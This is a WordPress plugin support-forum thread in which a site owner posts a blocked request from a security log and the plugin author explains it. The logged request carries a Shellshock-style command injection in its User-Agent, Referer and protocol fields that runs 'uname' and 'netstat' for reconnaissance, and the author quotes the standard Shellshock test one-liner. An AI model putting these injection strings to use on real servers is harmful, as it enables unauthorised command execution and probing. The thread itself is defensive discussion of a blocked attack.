Title: hacking attempts
Last modified: August 22, 2016

---

# hacking attempts

 *  Resolved [flyfisher842](https://wordpress.org/support/users/flyfisher842/)
 * (@flyfisher842)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/)
 * I have been finding this code in the security log.
    Since it is using echo and
   print commands, how much do I need to worry about BPS blocking it and do I need
   other code to stop it. If so, please help with the code.
 * =================
 *     ```
       [403 GET / HEAD Request: November 13, 2014 - 3:11 PM]
       Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
       Solution: N/A - Hacker/Spammer Blocked/Forbidden
       REMOTE_ADDR: 72.51.41.24
       Host Name: .
       SERVER_PROTOCOL: { :; }; echo Content-type:text/plain;echo;echo;echo M<code>expr 1330 + 7</code>H;uname -a; netstat -tn | grep \':80\' | awk \'{print $5}\' | cut -f1 -d: | sort | uniq | wc -l;echo @ HTTP/1.0
       HTTP_CLIENT_IP:
       HTTP_FORWARDED:
       HTTP_X_FORWARDED_FOR:
       HTTP_X_CLUSTER_CLIENT_IP:
       REQUEST_METHOD: GET
       HTTP_REFERER: () { :; }; echo Content-type:text/plain;echo;echo;echo M<code>expr 1330 + 7</code>H;uname -a; netstat -tn | grep \':80\' | awk \'{print $5}\' | cut -f1 -d: | sort | uniq | wc -l;echo @
       REQUEST_URI: /?x=()
       QUERY_STRING:
       HTTP_USER_AGENT: () { :; }; echo Content-type:text/plain;echo;echo;echo M<code>expr 1330 + 7</code>H;uname -a; netstat -tn | grep \':80\' | awk \'{print $5}\' | cut -f1 -d: | sort | uniq | wc -l;echo @
       ```
   
 * [https://wordpress.org/plugins/bulletproof-security/](https://wordpress.org/plugins/bulletproof-security/)

Viewing 6 replies - 1 through 6 (of 6 total)

 *  Plugin Author [AITpro](https://wordpress.org/support/users/aitpro/)
 * (@aitpro)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481445)
 * If something is being blocked/forbidden and logged by BPS in your Security Log
   as being blocked/forbidden then BPS has already handled the probe/recon/hack 
   attempt/other deviant stuff.
 * I have never seen a Security Log entry like that before. There are several things
   that BPS will block since they are unsafe/malicious/obvious attempts at doing
   something deviant/malicious.
 *  Thread Starter [flyfisher842](https://wordpress.org/support/users/flyfisher842/)
 * (@flyfisher842)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481468)
 * I have never seen one like this before either. It appears to be an attempt to
   have server information about the request sent back to the hacker.
 *  Plugin Author [AITpro](https://wordpress.org/support/users/aitpro/)
 * (@aitpro)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481523)
 * Yes, it checks for Ports in use and tries to capture data. In any case, BPS would
   never allow something like that since it violates about several different BPS
   security rules == not ever gonna happen.
 *  Plugin Author [AITpro](https://wordpress.org/support/users/aitpro/)
 * (@aitpro)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481528)
 * General question – thread has been resolved.
 *  Plugin Author [AITpro](https://wordpress.org/support/users/aitpro/)
 * (@aitpro)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481543)
 * I had a little spare time today so I took a look around the hood and it appears
   that the hacking attempt/vector is similar to Shellshock, also known as Bashdoor,
   which is a fairly new vulnerability discovered in the wild.
    [http://en.wikipedia.org/wiki/Shellshock_(software_bug)](http://en.wikipedia.org/wiki/Shellshock_(software_bug))
 * You can see the similarities in the vector
 *     ```
       env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
       ```
   
 * Since I have some spare time today I will do some testing with this attack vector
   and hack a test site to see what can be gained/exploited/etc.
 *  Plugin Author [AITpro](https://wordpress.org/support/users/aitpro/)
 * (@aitpro)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481544)
 * And yes I can hack websites. What kind of a professional website security expert
   would I be if I cannot do what the enemy can do. 😉

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘hacking attempts’ is closed to new replies.

 * ![](https://ps.w.org/bulletproof-security/assets/icon-128x128.png?rev=1731938)
 * [BulletProof Security](https://wordpress.org/plugins/bulletproof-security/)
 * [Support Threads](https://wordpress.org/support/plugin/bulletproof-security/)
 * [Active Topics](https://wordpress.org/support/plugin/bulletproof-security/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/bulletproof-security/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/bulletproof-security/reviews/)

 * 6 replies
 * 2 participants
 * Last reply from: [AITpro](https://wordpress.org/support/users/aitpro/)
 * Last activity: [11 years, 7 months ago](https://wordpress.org/support/topic/hacking-attempts/#post-5481544)
 * Status: resolved